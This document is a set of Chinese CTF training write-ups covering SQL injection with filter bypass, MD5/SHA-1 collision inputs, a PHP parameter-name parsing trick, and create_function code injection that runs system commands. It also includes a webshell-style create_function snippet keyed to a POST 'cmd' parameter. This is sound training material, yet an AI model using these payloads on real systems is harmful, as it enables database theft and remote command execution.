CTF集训
[SWPUCTF 2021 新生赛]sql
告诉了参数是wllm
?wllm=1' and 1=1#
有过滤,手测了一下,发现过滤了注释符,空格
# --> %23
--> /**/
?wllm=-1'/**/order/**/by/**/3%23
?wllm=-1'/**/order/**/by/**/4%23
oder by 4报错,说明列数是3
?wllm=-1'/**/union/**/select/**/1,2,database()%23
爆出库名test_db
?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'test_db'%23
爆表,这里=被过滤了,用like来替换
?wllm=-1'/**/union/**/select/**/1,2,group_concat(co
lumn_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'LTLT_flag'%23
爆列
?wllm=-1'/**/union/**/select/**/1,2,group_concat(id,flag)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,substring(group_concat(id,flag),0,10)/**/from/**/LTLT_flag%23
一开始想到用substring,但是不行,应该是被过滤了
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),1,30)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),20,30)/**/from/**/LTLT_flag%23
?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(id,flag),30,50)/**/from/**/LTLT_flag%23
拼起来就ok
NSSCTF{5059b7c3-906a-4f11-bca3-23311d9611cb}
[NISACTF 2022]level-up
没有东西,查看源代码
发现disallow:这个就是robots.txt内容的格式,去访问一下
进入level_2_1s_h3re.php
<?php
//here is level 2
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
$a1 = (string)$_POST['array1'];
$a2 = (string)$_POST['array2'];
if ($a1 == $a2){
die("????");
}
if (md5($a1) === md5($a2)){
echo $level3;
}
else{
die("level 2 failed ...");
}
}
else{
show_source(__FILE__);
}
?>
强碰撞
array1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&array2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2
进入Level___3.php
<?php
//here is level 3
error_reporting(0);
include "str.php";
if (isset($_POST['array1']) && isset($_POST['array2'])){
$a1 = (string)$_POST['array1'];
$a2 = (string)$_POST['array2'];
if ($a1 == $a2){
die("????");
}
if (sha1($a1) === sha1($a2)){
echo $level4;
}
else{
die("level 3 failed ...");
}
}
else{
show_source(__FILE__);
}
?>
sha强碰撞
array1=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
&array2=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1
进入level_level_4.php
<?php
//here is last level
error_reporting(0);
include "str.php";
show_source(__FILE__);
$str = parse_url($_SERVER['REQUEST_URI']);
if($str['query'] == ""){
echo "give me a parameter";
}
if(preg_match('/ |_|20|5f|2e|\./',$str['query'])){
die("blacklist here");
}
if($_GET['NI_SA_'] === "txw4ever"){
die($level5);
}
else{
die("level 4 failed ...");
}
?>
give me a parameterlevel 4 failed ...
知识点是php字符串解析特性,将非法字符变为_,这里将_用+替换
?NI+SA+=txw4ever
<?php
//sorry , here is true last level
//^_^
error_reporting(0);
include "str.php";
$a = $_GET['a'];
$b = $_GET['b'];
if(preg_match('/^[a-z0-9_]*$/isD',$a)){
show_source(__FILE__);
}
else{
$a('',$b);
}
\create_function('',}system('tac /flag');//);
这之后就要用create function注入
因为$a正则所以开头加个\绕过
}为了闭合前面 //注释掉后面得出flag
?a=\create_function&b=}system('tac /flag');//
create_function注入
create_function 函数
#创建匿名函数执行代码
#执行命令和上传文件参考eval函数(必须加分号)。
#菜刀连接密码:cmd
$func =create_function('',$_POST['cmd']);$func();
create_function函数
适用范围:PHP 4> = 4.0.1,PHP 5,PHP 7
功能:根据传递的参数创建匿名函数,并为其返回唯一名称。
create_function(string $args,string $code)
string $args 声明的函数变量部分
string $code 执行的方法代码部分
案例:
<?php
$newfunc = create_function('$a, $b', 'return "$a + $b = " . ($a + $b);');
echo "function: " . $newfunc . "\n";
echo $newfunc(3,4);
可以看到,create_function 的第一个参数是匿名函数的参数名,第二个参数是函数里面的逻辑代码
如何利用create_function 进行代码注入
<?php
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";
在这个例子中,将$str2的参数带入到create_function中执行,那我们就需要闭合这个函数,然后注释接下来的语句就可以形成我们的payload
http://fx.com/create2.php?id=;};phpinfo();//
上面匿名函数可能大家都看不明白,我把常用的函数声明的方式写出来
<?php
//常规方法
function func($a){
echo $a . 'test' . $_GET['id'] . ';';
}
//create2.php?id=;};phpinfo();// 注入后的代码
function func($a){
echo $a . 'test';}
phpinfo();//' . ';' //形成代码注入
}
code-breaking2018 中的一道题
<?php
$action = $_GET['action'] ?? '';
$arg = $_GET['arg'] ?? '';
if(preg_match('/^[a-z0-9_]*$/isD', $action)) {
show_source(__FILE__);
} else {
$action('', $arg);
}
这题十分简短精悍,特别看到$action('', $arg);就条件反射肯定是create_function,应该是需要找到一个在[a-z0-9_]之外的字符放置在函数前而不影响函数的调用,简单传入:
http://127.0.0.1:8087/?action=%20system&arg=
让页面报错了,fuzz之后得到\, \ 在php中是表示根命名空间就是整个代码就是\create_function('', $arg); 是可以运行的,arg就用我们上面说到的方法。最后的payload就是http://127.0.0.1/?action=\create_function&arg=}phpinfo();//